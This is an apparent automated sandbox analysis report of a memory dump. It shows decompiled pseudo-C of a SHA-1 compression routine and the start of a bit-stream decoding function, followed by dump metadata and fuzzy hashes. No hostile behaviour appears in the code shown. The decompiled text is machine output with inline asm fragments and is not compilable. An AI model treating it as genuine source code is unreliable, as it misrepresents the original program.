                                                                            					_a16 = _a16 + 0x5a827999 + ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t431;
                                                                            					_t436 = E001B5604( *((intOrPtr*)(_a8 - 4)));
                                                                            					asm("rol edx, 0x5");
                                                                            					 *((intOrPtr*)(_a8 - 4)) = _t436;
                                                                            					asm("ror esi, 0x2");
                                                                            					_a12 = _a12 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _a16 + _t436;
                                                                            					_t441 = E001B5604( *_a8);
                                                                            					asm("rol edx, 0x5");
                                                                            					 *_a8 = _t441;
                                                                            					asm("ror dword [esp+0x48], 0x2");
                                                                            					_t886 = _t886 + ((_t851 ^ _t593) & _a16 ^ _t593) + _a12 + 0x5a827999 + _t441;
                                                                            					_t443 = E001B5604( *((intOrPtr*)(_a8 + 4)));
                                                                            					_a8 = _a8 + 0x14;
                                                                            					asm("rol edx, 0x5");
                                                                            					 *((intOrPtr*)(_a8 + 4)) = _t443;
                                                                            					_t446 = _v24 + 5;
                                                                            					asm("ror dword [esp+0x48], 0x2");
                                                                            					_v24 = _t446;
                                                                            					_t593 = _t593 + ((_t851 ^ _a16) & _a12 ^ _t851) + _t886 + _t443 + 0x5a827999;
                                                                            					_v16 =  &(_t839[_t446]);
                                                                            					_t448 = E001B5604(_t839[_t446]);
                                                                            					_t906 =  &(_t906[5]);
                                                                            					asm("rol edx, 0x5");
                                                                            					 *_v16 = _t448;
                                                                            					_t430 = _v16;
                                                                            					asm("ror ebp, 0x2");
                                                                            					_t851 = _t851 + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t448;
                                                                            				} while (_v24 != 0xf);
                                                                            				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
                                                                            				asm("rol edx, 1");
                                                                            				asm("rol ecx, 0x5");
                                                                            				 *_t839 = _t769;
                                                                            				_t454 = ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t769 + _a16 + 0x5a827999;
                                                                            				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
                                                                            				_a16 = _t454;
                                                                            				asm("rol edx, 1");
                                                                            				asm("rol ecx, 0x5");
                                                                            				asm("ror ebx, 0x2");
                                                                            				_t839[1] = _t773;
                                                                            				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
                                                                            				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _a12 + 0x5a827999;
                                                                            				asm("ror esi, 0x2");
                                                                            				_a8 = _t460;
                                                                            				asm("rol edx, 1");
                                                                            				asm("rol ecx, 0x5");
                                                                            				_t839[2] = _t777;
                                                                            				_t466 = ((_t851 ^ _t593) & _a16 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
                                                                            				_t887 = _a16;
                                                                            				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
                                                                            				_v28 = _t466;
                                                                            				asm("ror ebp, 0x2");
                                                                            				_a16 = _t887;
                                                                            				_t888 = _a8;
                                                                            				asm("rol edx, 1");
                                                                            				asm("rol ecx, 0x5");
                                                                            				_t839[3] = _t781;
                                                                            				asm("ror ebp, 0x2");
                                                                            				_t782 = 0x11;
                                                                            				_a12 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
                                                                            				_a8 = _t888;
                                                                            				_v16 = _t782;
                                                                            				do {
                                                                            					_t89 = _t782 + 5; // 0x16
                                                                            					_t474 = _t89;
                                                                            					_v8 = _t474;
                                                                            					_t91 = _t782 - 5; // 0xc
                                                                            					_t92 = _t782 + 3; // 0x14
                                                                            					_t890 = _t92 & 0x0000000f;
                                                                            					_t595 = _t474 & 0x0000000f;
                                                                            					_v12 = _t890;
                                                                            					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
                                                                            					asm("rol edx, 1");
                                                                            					_t839[_t890] = _t786;
                                                                            					_t891 = _v28;
                                                                            					asm("rol ecx, 0x5");
                                                                            					asm("ror ebp, 0x2");
                                                                            					_v28 = _t891;
                                                                            					_t482 = _v16;
                                                                            					_v24 = _t851 + (_a16 ^ _a8 ^ _t891) + 0x6ed9eba1 + _a12 + _t786;
                                                                            					_t854 = _v20;
                                                                            					_t787 = 0xf;
                                                                            					_t841 = _t482 + 0x00000006 & _t787;
                                                                            					_t893 = _t482 + 0x00000004 & _t787;
                                                                            					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
                                                                            					asm("rol edx, 1");
                                                                            					 *(_t854 + _t893 * 4) = _t791;
                                                                            					_t855 = _a12;
                                                                            					asm("rol ecx, 0x5");
                                                                            					asm("ror esi, 0x2");
                                                                            					_a12 = _t855;
                                                                            					_t489 = _v16;
                                                                            					_a16 = _a16 + 0x6ed9eba1 + (_a8 ^ _v28 ^ _t855) + _v24 + _t791;
                                                                            					_t857 = _t489 + 0x00000007 & 0x0000000f;
                                                                            					_t670 = _v20;
                                                                            					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
                                                                            					asm("rol edx, 1");
                                                                            					 *(_t670 + _t595 * 4) = _t796;
                                                                            					_t596 = _v24;
                                                                            					asm("rol ecx, 0x5");
                                                                            					asm("ror ebx, 0x2");
                                                                            					_v24 = _t596;
                                                                            					_t597 = _v20;
                                                                            					_a8 = _a8 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _a12) + _a16 + _t796;
                                                                            					asm("rol ecx, 0x5");
                                                                            					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
                                                                            					asm("rol edx, 1");
                                                                            					 *(_t597 + _t841 * 4) = _t800;
                                                                            					_t598 = _a16;
                                                                            					_t839 = _v20;
                                                                            					asm("ror ebx, 0x2");
                                                                            					_a16 = _t598;
                                                                            					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _a12) + _a8 + _t800;
                                                                            					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
                                                                            					_t894 = _a8;
                                                                            					asm("rol edx, 1");
                                                                            					_t839[_t857] = _t804;
                                                                            					_t851 = _v24;
                                                                            					asm("rol ecx, 0x5");
                                                                            					_t782 = _v8;
                                                                            					asm("ror ebp, 0x2");
                                                                            					_a8 = _t894;
                                                                            					_a12 = _a12 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
                                                                            					_v16 = _t782;
                                                                            				} while (_t782 + 3 <= 0x23);
                                                                            				_t858 = 0x25;
                                                                            				_v16 = _t858;
                                                                            				while(1) {
                                                                            					_t199 = _t858 + 5; // 0x2a
                                                                            					_t512 = _t199;
                                                                            					_t200 = _t858 - 5; // 0x20
                                                                            					_v4 = _t512;
                                                                            					_t202 = _t858 + 3; // 0x28
                                                                            					_t806 = _t202 & 0x0000000f;
                                                                            					_v8 = _t806;
                                                                            					_t896 = _t512 & 0x0000000f;
                                                                            					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
                                                                            					asm("rol esi, 1");
                                                                            					_t599 = _v28;
                                                                            					_t839[_t806] = _t862;
                                                                            					asm("rol edx, 0x5");
                                                                            					asm("ror ebx, 0x2");
                                                                            					_t863 = 0xf;
                                                                            					_v28 = _t599;
                                                                            					_v24 = _a12 - 0x70e44324 + ((_a8 | _v28) & _t598 | _a8 & _t599) + _t862 + _v24;
                                                                            					_t519 = _v16;
                                                                            					_t601 = _t519 + 0x00000006 & _t863;
                                                                            					_t809 = _t519 + 0x00000004 & _t863;
                                                                            					_v12 = _t809;
                                                                            					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
                                                                            					asm("rol esi, 1");
                                                                            					_t839[_t809] = _t867;
                                                                            					_t842 = _a12;
                                                                            					_t810 = _v24;
                                                                            					asm("rol edx, 0x5");
                                                                            					asm("ror edi, 0x2");
                                                                            					_a12 = _t842;
                                                                            					_t243 = _t810 - 0x70e44324; // -1894007573
                                                                            					_t811 = _v20;
                                                                            					_a16 = _t243 + ((_v28 | _t842) & _a8 | _v28 & _t842) + _t867 + _a16;
                                                                            					_t526 = _v16;
                                                                            					_t844 = _t526 + 0x00000007 & 0x0000000f;
                                                                            					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
                                                                            					asm("rol esi, 1");
                                                                            					 *(_t811 + _t896 * 4) = _t871;
                                                                            					_t897 = _v24;
                                                                            					asm("rol edx, 0x5");
                                                                            					asm("ror ebp, 0x2");
                                                                            					_t814 = _a16 + 0x8f1bbcdc + ((_t897 | _a12) & _v28 | _t897 & _a12) + _t871 + _a8;
                                                                            					_v24 = _t897;
                                                                            					_t898 = _v20;
                                                                            					_a8 = _t814;
                                                                            					asm("rol edx, 0x5");
                                                                            					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
                                                                            					asm("rol esi, 1");
                                                                            					 *(_t898 + _t601 * 4) = _t875;
                                                                            					_t598 = _a16;
                                                                            					asm("ror ebx, 0x2");
                                                                            					_a16 = _t598;
                                                                            					_t815 = _t814 + ((_v24 | _t598) & _a12 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
                                                                            					_v28 = _t815;
                                                                            					asm("rol edx, 0x5");
                                                                            					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
                                                                            					asm("rol esi, 1");
                                                                            					 *(_t898 + _t844 * 4) = _t879;
                                                                            					_t899 = _a8;
                                                                            					_t845 = _v24;
                                                                            					asm("ror ebp, 0x2");
                                                                            					_a8 = _t899;
                                                                            					_t858 = _v4;
                                                                            					_a12 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _a12;
                                                                            					_v16 = _t858;
                                                                            					if(_t858 + 3 > 0x37) {
                                                                            						break;
                                                                            					}
                                                                            					_t839 = _v20;
                                                                            				}
                                                                            				_t816 = 0x39;
                                                                            				_v16 = _t816;
                                                                            				do {
                                                                            					_t310 = _t816 + 5; // 0x3e
                                                                            					_t546 = _t310;
                                                                            					_v8 = _t546;
                                                                            					_t312 = _t816 + 3; // 0x3c
                                                                            					_t313 = _t816 - 5; // 0x34
                                                                            					_t880 = 0xf;
                                                                            					_t901 = _t312 & _t880;
                                                                            					_t603 = _t546 & _t880;
                                                                            					_t881 = _v20;
                                                                            					_v4 = _t901;
                                                                            					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
                                                                            					asm("rol edx, 1");
                                                                            					 *(_t881 + _t901 * 4) = _t820;
                                                                            					_t902 = _v28;
                                                                            					asm("rol ecx, 0x5");
                                                                            					asm("ror ebp, 0x2");
                                                                            					_v28 = _t902;
                                                                            					_v24 = (_a16 ^ _a8 ^ _t902) + _t820 + _t845 + _a12 + 0xca62c1d6;
                                                                            					_t555 = _v16;
                                                                            					_t821 = 0xf;
                                                                            					_t847 = _t555 + 0x00000006 & _t821;
                                                                            					_t904 = _t555 + 0x00000004 & _t821;
                                                                            					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
                                                                            					asm("rol edx, 1");
                                                                            					 *(_t881 + _t904 * 4) = _t825;
                                                                            					_t882 = _a12;
                                                                            					asm("rol ecx, 0x5");
                                                                            					_a16 = (_a8 ^ _v28 ^ _t882) + _t825 + _a16 + _v24 + 0xca62c1d6;
                                                                            					_t564 = _v16;
                                                                            					asm("ror esi, 0x2");
                                                                            					_a12 = _t882;
                                                                            					_t884 = _t564 + 0x00000007 & 0x0000000f;
                                                                            					_t741 = _v20;
                                                                            					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
                                                                            					asm("rol edx, 1");
                                                                            					 *(_t741 + _t603 * 4) = _t830;
                                                                            					_t604 = _v24;
                                                                            					asm("rol ecx, 0x5");
                                                                            					asm("ror ebx, 0x2");
                                                                            					_v24 = _t604;
                                                                            					_t605 = _v20;
                                                                            					_a8 = (_t604 ^ _v28 ^ _a12) + _t830 + _a8 + _a16 + 0xca62c1d6;
                                                                            					asm("rol ecx, 0x5");
                                                                            					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
                                                                            					asm("rol edx, 1");
                                                                            					_t605[_t847] = _t834;
                                                                            					_t845 = _v24;
                                                                            					asm("ror dword [esp+0x3c], 0x2");
                                                                            					_v28 = (_t845 ^ _a16 ^ _a12) + _t834 + _v28 + _a8 + 0xca62c1d6;
                                                                            					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
                                                                            					_t905 = _a8;
                                                                            					asm("rol edx, 1");
                                                                            					_t605[_t884] = _t838;
                                                                            					_t606 = _a16;
                                                                            					_t885 = _v28;
                                                                            					asm("ror ebp, 0x2");
                                                                            					_t816 = _v8;
                                                                            					asm("rol ecx, 0x5");
                                                                            					_a8 = _t905;
                                                                            					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _a12;
                                                                            					_v16 = _t816;
                                                                            					_a12 = _t752;
                                                                            				} while (_t816 + 3 <= 0x4b);
                                                                            				_t592 = _a4;
                                                                            				_t592[1] = _t592[1] + _t885;
                                                                            				_t592[2] = _t592[2] + _t905;
                                                                            				_t592[3] = _t592[3] + _t606;
                                                                            				 *_t592 =  *_t592 + _t752;
                                                                            				_t592[4] = _t592[4] + _t845;
                                                                            				return _t592;
                                                                            			}
                                                                            0x0019ec53
                                                                            0x0019ec5d
                                                                            0x0019ec62
                                                                            0x0019ec68
                                                                            0x0019ec6c
                                                                            0x0019ec70
                                                                            0x0019ec74
                                                                            0x0019ec78
                                                                            0x0019ec7d
                                                                            0x0019ec90
                                                                            0x0019ec9f
                                                                            0x0019eca1
                                                                            0x0019eca4
                                                                            0x0019ecaa
                                                                            0x0019ecaf
                                                                            0x0019ecc2
                                                                            0x0019ecc8
                                                                            0x0019eccc
                                                                            0x0019ecdc
                                                                            0x0019ece5
                                                                            0x0019ecef
                                                                            0x0019ecf2
                                                                            0x0019ecf4
                                                                            0x0019ecfb
                                                                            0x0019ed01
                                                                            0x0019ed10
                                                                            0x0019ed1d
                                                                            0x0019ed23
                                                                            0x0019ed2b
                                                                            0x0019ed4c
                                                                            0x0019ed4f
                                                                            0x0019ed56
                                                                            0x0019ed5a
                                                                            0x0019ed5d
                                                                            0x0019ed67
                                                                            0x0019ed77
                                                                            0x0019ed7c
                                                                            0x0019ed84
                                                                            0x0019ed9b
                                                                            0x0019eda2
                                                                            0x0019eda6
                                                                            0x0019eda8
                                                                            0x0019edab
                                                                            0x0019edb1
                                                                            0x0019edba
                                                                            0x0019edca
                                                                            0x0019edcf
                                                                            0x0019edd6
                                                                            0x0019edda
                                                                            0x0019edde
                                                                            0x0019ede9
                                                                            0x0019edea
                                                                            0x0019edf4
                                                                            0x0019edf4
                                                                            0x0019edf4
                                                                            0x0019edf7
                                                                            0x0019edfa
                                                                            0x0019ee01
                                                                            0x0019ee06
                                                                            0x0019ee0b
                                                                            0x0019ee12
                                                                            0x0019ee20
                                                                            0x0019ee2f
                                                                            0x0019ee31
                                                                            0x0019ee37
                                                                            0x0019ee46
                                                                            0x0019ee49
                                                                            0x0019ee4c
                                                                            0x0019ee4d
                                                                            0x0019ee59
                                                                            0x0019ee5d
                                                                            0x0019ee67
                                                                            0x0019ee69
                                                                            0x0019ee70
                                                                            0x0019ee80
                                                                            0x0019ee89
                                                                            0x0019ee8b
                                                                            0x0019ee8e
                                                                            0x0019ee9a
                                                                            0x0019eea2
                                                                            0x0019eea9
                                                                            0x0019eeac
                                                                            0x0019eeb0
                                                                            0x0019eeb6
                                                                            0x0019eebc
                                                                            0x0019eec0
                                                                            0x0019eed0
                                                                            0x0019eedf
                                                                            0x0019eee2
                                                                            0x0019eee4
                                                                            0x0019eee7
                                                                            0x0019ef0b
                                                                            0x0019ef14
                                                                            0x0019ef17
                                                                            0x0019ef19
                                                                            0x0019ef1d
                                                                            0x0019ef27
                                                                            0x0019ef2e
                                                                            0x0019ef44
                                                                            0x0019ef4e
                                                                            0x0019ef50
                                                                            0x0019ef54
                                                                            0x0019ef62
                                                                            0x0019ef71
                                                                            0x0019ef79
                                                                            0x0019ef7e
                                                                            0x0019ef85
                                                                            0x0019ef9e
                                                                            0x0019efa4
                                                                            0x0019efa6
                                                                            0x0019efaa
                                                                            0x0019efb0
                                                                            0x0019efb8
                                                                            0x0019efbd
                                                                            0x0019efcd
                                                                            0x0019efd3
                                                                            0x0019efd7
                                                                            0x0019efe1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0019edf0
                                                                            0x0019edf0
                                                                            0x0019efe9
                                                                            0x0019efea
                                                                            0x0019efee
                                                                            0x0019efee
                                                                            0x0019efee
                                                                            0x0019eff3
                                                                            0x0019eff7
                                                                            0x0019effc
                                                                            0x0019f001
                                                                            0x0019f006
                                                                            0x0019f008
                                                                            0x0019f00a
                                                                            0x0019f00e
                                                                            0x0019f01d
                                                                            0x0019f02c
                                                                            0x0019f02e
                                                                            0x0019f031
                                                                            0x0019f039
                                                                            0x0019f03e
                                                                            0x0019f047
                                                                            0x0019f04d
                                                                            0x0019f051
                                                                            0x0019f055
                                                                            0x0019f05c
                                                                            0x0019f05e
                                                                            0x0019f071
                                                                            0x0019f080
                                                                            0x0019f082
                                                                            0x0019f085
                                                                            0x0019f08d
                                                                            0x0019f0a0
                                                                            0x0019f0a4
                                                                            0x0019f0a8
                                                                            0x0019f0ab
                                                                            0x0019f0bb
                                                                            0x0019f0c4
                                                                            0x0019f0ce
                                                                            0x0019f0d1
                                                                            0x0019f0d3
                                                                            0x0019f0da
                                                                            0x0019f0de
                                                                            0x0019f0f3
                                                                            0x0019f0fc
                                                                            0x0019f100
                                                                            0x0019f104
                                                                            0x0019f129
                                                                            0x0019f132
                                                                            0x0019f135
                                                                            0x0019f137
                                                                            0x0019f13a
                                                                            0x0019f148
                                                                            0x0019f155
                                                                            0x0019f172
                                                                            0x0019f175
                                                                            0x0019f179
                                                                            0x0019f17b
                                                                            0x0019f17e
                                                                            0x0019f184
                                                                            0x0019f18c
                                                                            0x0019f195
                                                                            0x0019f199
                                                                            0x0019f1a2
                                                                            0x0019f1a6
                                                                            0x0019f1a8
                                                                            0x0019f1af
                                                                            0x0019f1b3
                                                                            0x0019f1bc
                                                                            0x0019f1c0
                                                                            0x0019f1c3
                                                                            0x0019f1c6
                                                                            0x0019f1c9
                                                                            0x0019f1cb
                                                                            0x0019f1d5

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
                                                                            • Instruction ID: 0d9769aaf769b8c77f0036460832d05e0530db13dc8afdf41036f16639617446
                                                                            • Opcode Fuzzy Hash: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
                                                                            • Instruction Fuzzy Hash: D75248B26087019FC758CF19C891A6AF7E1FFC8304F49892DF9968B255D734E919CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
                                                                            			E001A66A2(signed int __ecx) {
                                                                            				void* __ebp;
                                                                            				signed int _t201;
                                                                            				signed int _t203;
                                                                            				signed int _t205;
                                                                            				signed int _t206;
                                                                            				signed int _t207;
                                                                            				signed int _t209;
                                                                            				signed int _t210;
                                                                            				signed int _t212;
                                                                            				signed int _t214;
                                                                            				signed int _t215;
                                                                            				signed int _t216;
                                                                            				signed int _t218;
                                                                            				signed int _t219;
                                                                            				signed int _t220;
                                                                            				signed int _t221;
                                                                            				unsigned int _t223;
                                                                            				signed int _t233;
                                                                            				signed int _t237;
                                                                            				signed int _t240;
                                                                            				signed int _t241;
                                                                            				signed int _t242;
                                                                            				signed int _t244;
                                                                            				signed int _t245;
                                                                            				signed short _t246;
                                                                            				signed int _t247;
                                                                            				signed int _t250;
                                                                            				signed int* _t251;
                                                                            				signed int _t253;
                                                                            				signed int _t254;
                                                                            				signed int _t255;
                                                                            				unsigned int _t256;
                                                                            				signed int _t259;
                                                                            				signed int _t260;
                                                                            				signed int _t261;
                                                                            				signed int _t263;
                                                                            				signed int _t264;
                                                                            				signed short _t265;
                                                                            				unsigned int _t269;
                                                                            				unsigned int _t274;
                                                                            				signed int _t279;
                                                                            				signed short _t280;
                                                                            				signed int _t284;
                                                                            				void* _t291;
                                                                            				signed int _t293;
                                                                            				signed int* _t295;
                                                                            				signed int _t296;
                                                                            				signed int _t297;
                                                                            				signed int _t301;
                                                                            				signed int _t304;
                                                                            				signed int _t305;
                                                                            				signed int _t308;
                                                                            				signed int _t309;
                                                                            				signed int _t310;
                                                                            				intOrPtr _t313;
                                                                            				intOrPtr _t314;
                                                                            				signed int _t315;
                                                                            				unsigned int _t318;
                                                                            				void* _t320;
                                                                            				signed int _t323;
                                                                            				signed int _t324;
                                                                            				unsigned int _t327;
                                                                            				void* _t329;
                                                                            				signed int _t332;
                                                                            				void* _t335;
                                                                            				signed int _t338;
                                                                            				signed int _t339;
                                                                            				intOrPtr* _t341;
                                                                            				void* _t342;
                                                                            				signed int _t345;
                                                                            				signed int* _t349;
                                                                            				signed int _t350;
                                                                            				unsigned int _t354;
                                                                            				void* _t356;
                                                                            				signed int _t359;
                                                                            				void* _t363;
                                                                            				signed int _t366;
                                                                            				signed int _t367;
                                                                            				unsigned int _t370;
                                                                            				void* _t372;
                                                                            				signed int _t375;
                                                                            				intOrPtr* _t377;
                                                                            				void* _t378;
                                                                            				signed int _t381;
                                                                            				void* _t384;
                                                                            				signed int _t388;
                                                                            				signed int _t389;
                                                                            				intOrPtr* _t391;
                                                                            				void* _t392;
                                                                            				signed int _t395;
                                                                            				void* _t398;
                                                                            				signed int _t401;
                                                                            				signed int _t402;
                                                                            				intOrPtr* _t404;
                                                                            				void* _t405;
                                                                            				signed int _t408;
                                                                            				signed int _t414;
                                                                            				unsigned int _t416;
                                                                            				unsigned int _t420;
                                                                            				signed int _t423;
                                                                            				signed int _t424;
                                                                            				unsigned int _t426;
                                                                            				unsigned int _t430;
                                                                            				signed int _t433;
                                                                            				signed int _t434;
                                                                            				void* _t435;
                                                                            				signed int _t436;
                                                                            				intOrPtr* _t438;
                                                                            				signed char _t440;
                                                                            				signed int _t442;
                                                                            				intOrPtr _t443;
                                                                            				signed int _t446;
                                                                            				signed int _t447;
                                                                            				signed int _t448;
                                                                            				void* _t455;
                                                                            
                                                                            				_t440 =  *(_t455 + 0x34);
                                                                            				 *(_t455 + 0x14) = __ecx;
                                                                            				if( *((char*)(_t440 + 0x2c)) != 0) {
                                                                            					L3:
                                                                            					_t313 =  *((intOrPtr*)(_t440 + 0x18));
                                                                            					_t438 = _t440 + 4;
                                                                            					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
                                                                            					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
                                                                            						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
                                                                            						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
                                                                            						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
                                                                            						 *(_t455 + 0x14) = _t201;
                                                                            						 *(_t455 + 0x10) = _t414;
                                                                            						_t293 = _t201;
                                                                            						__eflags = _t201 - _t414;
                                                                            						if(_t201 >= _t414) {
                                                                            							_t293 = _t414;
                                                                            						}
                                                                            						 *(_t455 + 0x3c) = _t293;
                                                                            						while(1) {
                                                                            							_t314 =  *_t438;
                                                                            							__eflags = _t314 - _t293;
                                                                            							if(_t314 < _t293) {
                                                                            								goto L15;
                                                                            							}
                                                                            							L9:
                                                                            							__eflags = _t314 - _t201;
                                                                            							if(__eflags > 0) {
                                                                            								L93:
                                                                            								L94:
                                                                            								return _t201;
                                                                            							}
                                                                            							if(__eflags != 0) {
                                                                            								L12:
                                                                            								__eflags = _t314 - _t414;
                                                                            								if(_t314 < _t414) {
                                                                            									L14:
                                                                            									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
                                                                            									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
                                                                            										L92:
                                                                            										 *((char*)(_t440 + 0x4ad3)) = 1;
                                                                            										goto L93;
                                                                            									}
                                                                            									goto L15;
                                                                            								}
                                                                            								__eflags =  *((char*)(_t440 + 0x4ad2));
                                                                            								if( *((char*)(_t440 + 0x4ad2)) == 0) {
                                                                            									goto L92;
                                                                            								}
                                                                            								goto L14;
                                                                            							}
                                                                            							_t201 =  *(_t440 + 8);
                                                                            							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
                                                                            							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
                                                                            								goto L93;
                                                                            							}
                                                                            							goto L12;
                                                                            							L15:
                                                                            							_t315 =  *(_t440 + 0x4adc);
                                                                            							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
                                                                            							if( *(_t440 + 0x4ad8) > _t315 - 8) {
                                                                            								_t284 = _t315 + _t315;
                                                                            								 *(_t440 + 0x4adc) = _t284;
                                                                            								_push(_t284 * 0xc);
                                                                            								_push( *(_t440 + 0x4ad4));
                                                                            								_t310 = E001B2B5E(_t315, _t414);
                                                                            								__eflags = _t310;
                                                                            								if(_t310 == 0) {
                                                                            									E00196D3A(0x1d00e0);
                                                                            								}
                                                                            								 *(_t440 + 0x4ad4) = _t310;
                                                                            							}
                                                                            							_t203 =  *(_t440 + 0x4ad8);
                                                                            							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
                                                                            							 *(_t455 + 0x24) = _t295;
                                                                            							 *(_t440 + 0x4ad8) = _t203 + 1;
                                                                            							_t205 = E0019A4ED(_t438);
                                                                            							_t206 =  *(_t440 + 0xb4);
                                                                            							_t416 = _t205 & 0x0000fffe;
                                                                            							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
                                                                            							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
                                                                            								_t442 = 0xf;
                                                                            								_t207 = _t206 + 1;
                                                                            								__eflags = _t207 - _t442;
                                                                            								if(_t207 >= _t442) {
                                                                            									L27:
                                                                            									_t318 =  *(_t438 + 4) + _t442;
                                                                            									 *(_t438 + 4) = _t318 & 0x00000007;
                                                                            									_t209 = _t318 >> 3;
                                                                            									 *_t438 =  *_t438 + _t209;
                                                                            									_t320 = 0x10;
                                                                            									_t443 =  *((intOrPtr*)(_t455 + 0x1c));
                                                                            									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
                                                                            									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
                                                                            									asm("sbb eax, eax");
                                                                            									_t210 = _t209 & _t323;
                                                                            									__eflags = _t210;
                                                                            									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
                                                                            									goto L28;
                                                                            								}
                                                                            								_t404 = _t440 + 0x34 + _t207 * 4;
                                                                            								while(1) {
                                                                            									__eflags = _t416 -  *_t404;
                                                                            									if(_t416 <  *_t404) {
                                                                            										break;
                                                                            									}
                                                                            									_t207 = _t207 + 1;
                                                                            									_t404 = _t404 + 4;
                                                                            									__eflags = _t207 - 0xf;
                                                                            									if(_t207 < 0xf) {
                                                                            										continue;
                                                                            									}
